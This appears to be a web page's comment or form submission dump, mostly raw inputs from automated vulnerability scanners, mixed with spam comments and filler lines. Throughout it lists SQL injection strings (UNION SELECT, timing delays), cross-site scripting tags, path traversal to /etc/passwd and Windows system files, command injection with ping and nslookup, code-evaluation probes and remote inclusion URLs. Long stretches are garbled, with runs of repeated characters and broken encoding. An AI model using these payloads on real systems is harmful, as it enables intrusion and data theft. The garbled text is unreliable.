testing




I have been surfing oninle greater than three hours nowadays, yet I never discovered any interesting article like yours. It is pretty price enough for me. In my view, if all website owners and bloggers made excellent content material as you probably did, the net might be much more useful than ever before.


I have been surfing oninle greater than three hours nowadays, yet I never discovered any interesting article like yours. It is pretty price enough for me. In my view, if all website owners and bloggers made excellent content material as you probably did, the net might be much more useful than ever before.


GubWO7 <a href=\"http://qbqrsrsisktc.com/\">qbqrsrsisktc</a>


GubWO7 <a href=\"http://qbqrsrsisktc.com/\">qbqrsrsisktc</a>















1


1


1


1


1


1


1


1


1


1


1


1


1


1




1


1


1


1


1


asdf7664


asdf7664


asdf7664


asdf7664


asdf7664


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


\" AND 1=2 --


\" AND 1=1 --


\' AND 1=2 --


\' AND 1=1 --


1 AND 1=2 --


1 AND 1=1 --


1\" UNION SELECT 8, table_name, \'vega\' FROM information_schema.tables WHERE table_name like\'%


1\" UNION SELECT 8, table_name, \'vega\' FROM information_schema.taables WHERE taable_name like\'%


1\'\'


1\\\'


1\' UNION SELECT 8, table_name, \'vega\' FROM information_schema.tables WHERE table_name like\'%


1\'


1\' UNION SELECT 8, table_name, \'vega\' FROM information_schema.taables WHERE taable_name like\'%


1\" AND 1=2 --


1\" AND 1=1 --


1 AND 1=2 --


1 AND 1=1 --


1\' AND 1=2 --


1\' AND 1=1 --


1\'\"\'\"\'\"\'\"


1\'\'\'\'\"\"\"\"


1\\\\\'\\\\\"


1\'\"


1\\\'\\\"


phpinfo();


vega>\'>\"></vega><vega>


vega>\'>\"><vega></vega>


vega://invalid/;?


//vega.invalid/;?


http://vega.invalid/;?


1 0 0 - -


1 - 0 - 0


1-0-9


1-0-0


1-0


www.google.com/humans.txt


hthttp://tp://www.google.com/humans.txt


hthttpttp://www.google.com/humans.txt


htTp://www.google.com/humans.txt


http://www.google.com/humans.txt


1\'uname\'


1\'false\'


1\'true\'


1\"`uname`\"


1\"`false`\"


1`uname`


1`false`


1\"`true`\"


1`true`


/../../../../../../../../../../../../etc/passwd


\' -->\">\'>\'\"<vvv002687v014587>


\" -->\">\'>\'\"<vvv002686v014587>


\' style=vvv002685v014587


\' onMouseOver=vvv002684v014587


\" style=vvv002683v014587


\" onMouseOver=vvv002682v014587


vbscript:vvv002681v014587


javascript:vvv002680v014587


1\' -->\">\'>\'\"<vvv002679v014587>


1*/ -->\">\'>\'\"<vvv002678v014587>


1 -->\">\'>\'\"<vvv002677v014587>


1 src=-->\">\'>\'\"<vvv002676v014587>


1\" src=-->\">\'>\'\"<vvv002675v014587>


1</textarea>-->\">\'>\'\"<vvv002674v014587>


1.htaccess.aspx-->\">\'>\'\"<vvv002673v014587>


1-->\">\'>\'\"<vvv002672v014587>


1bogus Vega-Inject:bogus


1bogus Vega-Inject:bogus


\" src=http://vega.invalid/;?


src=http://vega.invalid/;?


1


1


1


1


1


1


undefined


/../../../../../../../../../../../../etc/passwd\0


1


1


1


/etc/passwd


1


1


1


/etc/passwd\0


1


1


1


file:/etc/passwd


1


1


1


file:/etc/passwd\0


1


1


..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd


1


1




123


<scirpt>alert(\"hi\")</script>


<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>


hello<script>alert(\"abc\");</script>


Hi


\'\"><





ccc










































Hello


Hello; ping -c 8 www.google.com'; ping -c 8 www.google.com" | ping -c 8 www.google.com










































c:/Windows/system.ini


../../../../../../../../../../../../../../../../Windows/system.ini


c:\Windows\system.ini


..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system.ini


/etc/passwd


../../../../../../../../../../../../../../../../etc/passwd


c:/


/


c:\


../../../../../../../../../../../../../../../../


WEB-INF/web.xml


WEB-INF\web.xml


/WEB-INF/web.xml


\WEB-INF\web.xml


thishouldnotexistandhopefullyitwillnot
















































































1


1


response.write(9675180*9136103)


'+response.write(9675180*9136103)+'


"+response.write(9675180*9136103)+"


1


1


-1 OR 2+194-194-1=0+0+0+1 --


-1 OR 2+734-734-1=0+0+0+1


-1' OR 2+732-732-1=0+0+0+1 --


-1' OR 2+911-911-1=0+0+0+1 or 'cTvNpkFa'='


-1" OR 2+675-675-1=0+0+0+1 --


set|set&set


E97XZGaL


$(nslookup cL6PLAr6)


../../../../../../../../../../etc/passwd


-1; waitfor delay '0:0:3' --


&nslookup SpJmyte7&'\"`0&nslookup SpJmyte7&`'


../../../../../../../../../../../../../../../proc/version


-1); waitfor delay '0:0:3' --



1 waitfor delay '0:0:3' --


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg


12345'"\'\");|]*{ <>�''💩


yQDWL3x1'; waitfor delay '0:0:3' --


Array


../../../../../../../../../../etc/passwd.jpg


${9999261+9999908}


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg


http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg


1&n988496=v935396


/../..//../..//../..//../..//../..//etc/passwd.jpg


)


.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd


1some_inexistent_file_with_long_name.jpg


!(()&&!|*|*|


/etc/passwd


Http://testasp.vulnweb.com/t/fit.txt


^(#$!@#$)(()))******


%2fetc%2fpasswd


Array


;print(md5(acunetix_wvs_security_test));


http://testasp.vulnweb.com/t/fit.txt?.jpg


'"()


';print(md5(acunetix_wvs_security_test));$a='


http://testasp.vulnweb.com/t/xss.html?%00.jpg


testasp.vulnweb.com


comment.php


/.././.././.././.././.././.././.././../etc/./passwd%00


";print(md5(acunetix_wvs_security_test));$a="


http://hitcZ2C3AhV9o.bxss.me/


comment.php


1'"


../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd


${@print(md5(acunetix_wvs_security_test))}


\


comment.php/.


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd


${@print(md5(acunetix_wvs_security_test))}\


)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


/www.vulnweb.com


1����


'"


..��..��..��..��..��..��..��..��etc/passwd



@@X3BUM<!--


invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.


JyI=


file:///etc/passwd


1_9478


�'�"


�''�""


/\../\../\../\../\../\../\../etc/passwd


(select convert(int,CHAR(65)))


WEB-INF/web.xml


/WEB-INF/web.xml


WEB-INF\web.xml


../../../../../../../../../../windows/win.ini


../../../../../../../../../../boot.ini


../../../../../../../../../../windows/win.ini.jpg


������������������������������������������������windows��win.ini


................windowswin.ini


..\..\..\..\..\..\..\..\windows\win.ini


/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini


../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini


unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\


WEB-INF/web.xml


WEB-INF\web.xml


response.write(9813738*9538659)


'+response.write(9813738*9538659)+'


"+response.write(9813738*9538659)+"


1


1


1


1


1


1


1


1


set|set&set


-1 OR 2+616-616-1=0+0+0+1 --


$(nslookup JqqQBgnL)


&nslookup ZV0yDD3R&'\"`0&nslookup ZV0yDD3R&`'


-1 OR 2+649-649-1=0+0+0+1


1


-1' OR 2+815-815-1=0+0+0+1 --


1


-1' OR 2+604-604-1=0+0+0+1 or 'tJa5gNlE'='


-1" OR 2+810-810-1=0+0+0+1 --


1


1


1


-1; waitfor delay '0:0:6' --


1


-1); waitfor delay '0:0:6' --


1rW6BQcL


1 waitfor delay '0:0:6' --


1


OuetOPZB'; waitfor delay '0:0:6' --


1


../../../../../../../../../../etc/passwd


../../../../../../../../../../../../../../../proc/version


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg



../../../../../../../../../../etc/passwd.jpg


12345'"\'\");|]*{ <>�''💩


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg


Array


1


/../..//../..//../..//../..//../..//etc/passwd.jpg


1


1


.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd


1


1


/etc/passwd


1


1


%2fetc%2fpasswd


1


1


/.././.././.././.././.././.././.././../etc/./passwd%00


1


1


../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd


1


1


${10000114+9999604}


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd


http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg


1


..��..��..��..��..��..��..��..��etc/passwd


1some_inexistent_file_with_long_name.jpg


1


1


invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.


Http://testasp.vulnweb.com/t/fit.txt


1&n926235=v923401


1


file:///etc/passwd


http://testasp.vulnweb.com/t/fit.txt?.jpg


1


1


/\../\../\../\../\../\../\../etc/passwd


testasp.vulnweb.com


1


WEB-INF/web.xml


1


1


)


/WEB-INF/web.xml


1


WEB-INF\web.xml


1


!(()&&!|*|*|


../../../../../../../../../../windows/win.ini


^(#$!@#$)(()))******


1


../../../../../../../../../../boot.ini


1


1


../../../../../../../../../../windows/win.ini.jpg


1


1


������������������������������������������������windows��win.ini


1


1


1


................windowswin.ini


1


1


1


..\..\..\..\..\..\..\..\windows\win.ini


1


1


1


/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini


1


1


../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini


1


1


Array


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini


1


1


'"()


;print(md5(acunetix_wvs_security_test));


http://testasp.vulnweb.com/t/xss.html?%00.jpg


1


';print(md5(acunetix_wvs_security_test));$a='


1


unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\